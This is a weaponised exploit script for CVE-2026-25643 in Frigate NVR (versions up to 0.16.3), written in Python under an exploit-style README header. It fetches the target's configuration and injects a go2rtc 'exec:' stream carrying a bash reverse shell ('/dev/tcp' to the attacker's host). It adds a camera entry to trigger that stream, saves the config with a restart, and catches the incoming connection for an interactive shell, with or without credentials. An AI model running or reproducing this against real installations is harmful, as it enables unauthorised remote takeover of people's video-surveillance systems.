README.md
Rendering markdown...
# Exploit Title: Frigate NVR <= 0.16.3 - RCE (Authenticated & Unauthenticated)
# Date: 2026-02-05
# Exploit Author: jduardo2704
# Vendor Homepage: https://frigate.video/
# Software Link: https://github.com/blakeblackshear/frigate
# Version: <= 0.16.3
# Tested on: Linux / Docker
# CVE: CVE-2026-25643
# Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
import requests
import argparse
import sys
import json
import urllib3
import yaml
import time
import socket
import threading
import select
import re
# Silence SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Colors
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
RESET = '\033[0m'
# Event to synchronize the listener with the exploit thread
exploit_ready = threading.Event()
def print_status(msg, color=BLUE, symbol="[*]"):
    """Print one status line to stdout.

    The line is the ANSI ``color`` code, the ``symbol`` tag, a space and
    ``msg``, followed by the module-level ``RESET`` code so later output
    is not colored.
    """
    line = f"{color}{symbol} {msg}{RESET}"
    print(line)
def login_frigate(session, url, username, password):
try:
print_status(f"Authenticating as {username}...", BLUE)
res = session.post(f"{url}/api/login", json={"user": username, "password": password}, verify=False, timeout=10)
return res.status_code == 200
except:
return False
def get_config(session, url):
try:
res = session.get(f"{url}/api/config/raw", timeout=10)
content = res.text.strip()
if content.startswith('"'):
try:
config_raw = json.loads(content)
except:
config_raw = content
else:
config_raw = content
return yaml.safe_load(config_raw)
except:
return None
def send_payload(session, url, data):
final_yaml = yaml.dump(data)
try:
session.post(
f"{url}/api/config/save?save_option=restart",
data=final_yaml,
headers={"Content-Type": "text/plain"},
timeout=5
)
except:
pass
def inject_and_exploit(url, username, password, lhost, lport):
"""Function to run in background thread"""
session = requests.Session()
session.verify = False
# 1. AUTHENTICATION LOGIC
if username and password:
if not login_frigate(session, url, username, password):
print_status("Login failed with provided credentials.", RED, "[-]")
sys.exit(1)
print_status("Logged in successfully.", BLUE)
else:
print_status("No credentials provided. Trying unauthenticated access...", YELLOW)
# 2. CONFIG RETRIEVAL & VALIDATION
print_status("Fetching configuration...", BLUE)
config = get_config(session, url)
if not config or not isinstance(config, dict):
print_status("Failed to retrieve a valid configuration dictionary.", RED, "[-]")
print_status("Target might be authenticated or API is restricted.", RED, "[-]")
sys.exit(1)
# 3. PAYLOAD PREPARATION
try:
payload = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
# Inject go2rtc
if 'go2rtc' not in config or config['go2rtc'] is None: config['go2rtc'] = {}
if 'streams' not in config['go2rtc'] or config['go2rtc']['streams'] is None: config['go2rtc']['streams'] = {}
config['go2rtc']['streams']['cve_poc'] = [f"exec:{payload}"]
# Inject camera trigger
if 'cameras' not in config or config['cameras'] is None: config['cameras'] = {}
config['cameras']['cve_trigger'] = {
'ffmpeg': {'inputs': [{'path': 'rtsp://127.0.0.1:8554/cve_poc', 'roles': ['detect']}]},
'detect': {'enabled': False},
'audio': {'enabled': False},
'enabled': True
}
print_status("Payload injected into config structure.", GREEN, "[+]")
# 4. SIGNAL LISTENER TO START
exploit_ready.set()
time.sleep(5)
print_status("Sending malicious config & triggering restart...", YELLOW)
send_payload(session, url, config)
except Exception as e:
print_status(f"Error during payload injection: {e}", RED, "[-]")
sys.exit(1)
def shell_handler(lport):
"""Handles the incoming reverse shell connection"""
print_status("Waiting for validation...", BLUE)
if not exploit_ready.wait(timeout=20):
print_status("Timeout waiting for exploit thread validation.", RED, "[-]")
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind(('0.0.0.0', int(lport)))
s.listen(1)
print_status(f"Validation OK. Listening on 0.0.0.0:{lport}...", GREEN, "[+]")
s.settimeout(60)
try:
conn, addr = s.accept()
print_status(f"Connection received from {addr[0]}!", GREEN, "[+]")
print(f"{YELLOW}--- SHELL ESTABLISHED ---\n{RESET}")
s.settimeout(None)
conn.settimeout(None)
while True:
r, _, _ = select.select([sys.stdin, conn], [], [])
if conn in r:
data = conn.recv(4096)
if not data: break
# CLEAN OUTPUT LOGIC
output = data.decode(errors='ignore')
# Remove annoying bash TTY errors using Regex
# Matches "bash: cannot set terminal process group (PID): Inappropriate ioctl..."
output = re.sub(r"bash: cannot set terminal process group \(\d+\): Inappropriate ioctl for device\r?\n?", "", output)
# Matches "bash: no job control in this shell"
output = output.replace("bash: no job control in this shell\r\n", "")
output = output.replace("bash: no job control in this shell\n", "")
sys.stdout.write(output)
sys.stdout.flush()
if sys.stdin in r:
cmd = sys.stdin.readline()
conn.send(cmd.encode())
except socket.timeout:
print_status("Exploit sent but no connection received (Timeout > 60s).", RED, "[-]")
except KeyboardInterrupt:
print_status("\nClosing connection.", RED)
except Exception as e:
print_status(f"Listener error: {e}", RED)
finally:
s.close()
def main():
parser = argparse.ArgumentParser(description="Frigate <= 0.16.3 RCE (Auto-Shell) - CVE-2026-25643")
parser.add_argument('-u', '--url', required=True, help="Target URL")
parser.add_argument('-U', '--username', required=False, help="Username (optional)")
parser.add_argument('-P', '--password', required=False, help="Password (optional)")
parser.add_argument('-lh', '--lhost', required=True, help="Your IP (LHOST)")
parser.add_argument('-lp', '--lport', required=True, help="Your Port (LPORT)")
args = parser.parse_args()
exploit_thread = threading.Thread(
target=inject_and_exploit,
args=(args.url.rstrip('/'), args.username, args.password, args.lhost, args.lport)
)
exploit_thread.daemon = True
exploit_thread.start()
shell_handler(args.lport)
if __name__ == "__main__":
main()